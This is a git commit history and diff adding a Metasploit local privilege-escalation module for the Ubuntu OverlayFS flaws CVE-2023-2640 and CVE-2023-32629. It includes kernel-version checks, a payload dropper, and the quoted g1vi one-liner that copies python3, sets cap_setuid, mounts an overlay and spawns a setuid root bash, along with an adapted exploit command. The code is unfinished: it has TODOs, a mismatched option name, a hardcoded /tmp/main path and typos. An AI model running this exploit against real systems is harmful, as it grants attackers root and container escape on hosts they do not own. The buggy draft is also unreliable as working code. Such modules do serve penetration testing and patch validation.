Rebase and Squash

init

Add moduel scaffolding

Add Opts, check and exploit methods

Rubocop changes

Add checks for vunerable kernel versions

Write check for distro type

Finish protoype of check add exploit

Make changes to check method

Add checkcode

Add x86 for payload compatability

remove check, add kernel version

add codenam, transform keys in vuln

Note

minor spelling change

Add description

Add cve references

Start trying to drop payloads on disk

Change description, include modules for file upload, use proper methods for writing payload

continue trying to upload

Use write_file instead of upload_and_chmodx

remove upload_dir opt

expirement w g1vi exploit

Include cmd_stage module, add generate_payload_exe, run payload in new namespace

Add missing call to setcap, fix description

Fix unterminated string, fix directory for calling python copy

Rubocop changes

Create dynamic payload

Add mkdir_p and WritableDir opts

Update modules/exploits/linux/local/game_overlay_privesc.rb

Co-authored-by: Julien Voisin <[email protected]>

Revert back to python exploit, add dynamic writable dir

Add todos

Remove FileUtils

Change module name

Add checkcodes

Add more checkcodes

Author: Corey

modules/exploits/linux/local/gameoverlay_privesc.rb

@@ -0,0 +1,164 @@
+class MetasploitModule < Msf::Exploit::Local
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::CmdStager
+  include FileUtils
+
+  # TODO 
+  # 1) Add Msf::Post::Linux::System::get_sysinfo to get linux and kernel versions
+  # ^ What does the output change to 
+  #
+  # 4) Make exploit more readable with multiline string, change exploit to use 
+  # todo add python requirement
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'GameOver(lay) Privilege Escalation and Container Escape',
+        'Description' => %q{
+          This module exploits the use of unsafe functions in a number of Ubuntu kernels
+          utilizing vunerable versions of overlayfs. To mitigate CVE-2021-3493 the Linux
+          kernel added a call to vfs_setxattr during ovl_do_setxattr. Due to independent
+          changes to the kernel by the Ubuntu development team __vfs_setxattr_noperm is
+          called during ovl_do_setxattr without calling the intermediate safety function
+          vfs_setxattr. Ultimatly this module allows for root access to be achieved by
+          writing setuid capabilities to a file which are not sanitized after being unioned
+          with the upper mounted directory.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'g1vi', # PoC
+          'h00die', # Module Suggestion
+          'gardnerapp', # MsF Module
+        ],
+        'Platform' => ['linux'],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'DisclosureDate' => '2023-07-26',
+        'References' => [
+          ['URL', 'https://www.crowdstrike.com/blog/crowdstrike-discovers-new-container-exploit/'],
+          ['URL', 'https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629'],
+          ['URL', 'https://www.cvedetails.com/cve/CVE-2023-2640/'],
+          ['URL', 'https://www.cvedetails.com/cve/CVE-2023-32629/'],
+          ['URL', 'https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability'],
+          ['CVE', '2023-32629'],
+          ['CVE', '2023-2640']
+        ],
+        'Targets' => [ [ 'Linux', {} ] ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'CmdStagerFlavor' => 'bourne'
+      )
+    )
+    register_options [
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']),
+      OptString.new('PayloadFileName', [true, 'Name of payloadf', 'marv'])
+    ]
+  end
+
+  def vuln
+    # Keys are ubuntu versions, vals is list of vunerable kernels
+    {
+      "Lunar Lobster": %w[6.2.0], # Ubuntu 23.04
+      "Kinetic Kudu": %w[5.19.0], # Ubuntu 22.10
+      "Jammy Jellyfish": %w[5.19.0 6.2.0], # Ubuntu 22.04 LTS
+      "Focal Fossa": %w[5.4.0], # Ubuntu 20.04 LTS
+      "Bionic Beaver": %w[5.4.0] # Ubuntu 18.04 LTS
+    }.transform_keys!(&:to_s) # w/o this key will be :"Bionic Beaver"
+  end
+
+  def check
+    return CheckCode::Safe('Target is not linux.') unless session.platform == 'linux'
+
+    # Must be Ubuntu
+    return CheckCode::Safe('Target is not Ubuntu.') unless kernel_version =~ /[uU]buntu/
+
+    os = cmd_exec 'cat /etc/os-release'
+
+    # grab codename i.e. Focal Fossa
+    codename = os.scan(/\(\w* \w*\)/)[0]
+
+    # Remove '(' and ')'
+    codename.delete_prefix!('(').delete_suffix!(')')
+
+    print_status "Detected Ubuntu version: #{codename}"
+
+    # uname -r
+    # yields something like 5.4.0-1018-blah
+    kernel = kernel_release
+    print_status "Detected kernel version: #{kernel}"
+
+    # Make sure release is running vunerable kernel
+    # will this return in correct context??
+    # could scan kernel to prevent looping if return below doesn't work
+    vuln[codename].each do |version|
+      if kernel.include? version
+        return CheckCode::Vulnerable "#{codename} with #{kernel} kernel is vunerable"
+      end
+    end
+
+    return CheckCode::Safe("Target does not appear to be running a vunerable Ubuntu Distro or Kernel")
+  end
+
+  def execute_command(_cmd, _opts = {})
+    pay_file = datastore['PayloadFilename']
+
+    pay_dir = datastore['WritableDir']
+    pay_dir += "/" unless pay_dir.ends_with? "/"
+    pay_dir += Rex::Text.rand_text_alpha 10
+
+    directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" }
+
+    # Should we make sure directory doesn't already exist?
+
+    directories.each do |dir|
+      print_status "Creating directory #{dir}"
+      mkdir dir
+    end
+
+    register_dir_for_cleanup pay_dir
+
+    print_status "Creating directory to store payload: #{pay_dir}"
+    pay_dir.concat "/" unless pay_dir.ends_with? "/"
+    cmd_exec "mkdir -p #{pay_dir}"
+
+    register_dir_for_cleanup pay_dir
+
+    pay = "#{pay_dir}#{pay_file}"
+
+    print_status "Writing payload: #{pay}"
+
+    write_file "#{pay}", generate_payload_exe
+    # works move test to low, run unshare mount set cap, shell
+
+    print_status 'Starting new namespace, and running exploit...'
+
+    # g1vi original
+    # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
+    
+    # TODO move running of payload and exploit to different cmd_exec calls
+    # Swap vulns w code names, make sure regexes work agsain,s
+    hack =  <<-TEXT
+    unshare -rm sh -c \"cp /u*/b*/p*3 #{pay_dir};
+        setcap cap_setuid+eip #{pay_dir}l/python3; 
+        mount -t overlay overlay -o rw,lowerdir=#{pay_dir}l,upperdir=#{pay_dir}u,workdir=#{pay_dir}w #{pay_dir}m 
+        && touch /tmp/main/m/* 
+      \" 
+     && #{pay_dir}/u/python3 -c 'import os;os.setuid(0); os.system(\"#{pay}\")'
+    TEXT
+
+    print_status "Running exploit:\n '#{hack}'\n "
+    print_status "Output of command: #{cmd_exec_with_result(hack)}"
+  end
+
+  def exploit
+    puts "System Info: #{get_sysinfo}"
+    execute_cmdstager
+
+    # System Info: {:kernel=>"Linux ip-172-26-8-97 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux", :distro=>"ubuntu", :version=>"Ubuntu 20.04.6 LTS"}
+  end
+
+end